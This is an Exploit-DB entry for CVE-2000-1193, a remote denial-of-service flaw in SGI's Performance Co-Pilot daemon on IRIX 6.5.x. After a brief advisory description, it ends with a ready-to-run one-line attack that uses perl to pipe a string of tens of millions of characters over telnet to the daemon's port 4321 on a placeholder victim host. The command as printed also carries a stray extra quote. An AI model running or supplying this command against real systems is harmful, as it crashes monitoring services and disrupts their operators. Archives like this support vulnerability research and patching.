IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability

2002-04-12T00:00:00
ID EDB-ID:21431
Type exploitdb
Reporter Marcelo Magnasco
Modified 2002-04-12T00:00:00

Description

IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability. CVE-2000-1193. Dos exploit for irix platform

                                        
                                            source: http://www.securityfocus.com/bid/4642/info

Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems.

A vulnerability exists in some versions of the PCP daemon. It is possible to cause a denial of service condition by sending the daemon a large string of arbitrary data.


% perl -e 'print " a" x 92834244,"\n";'' | telnet sgi.victim.com 4321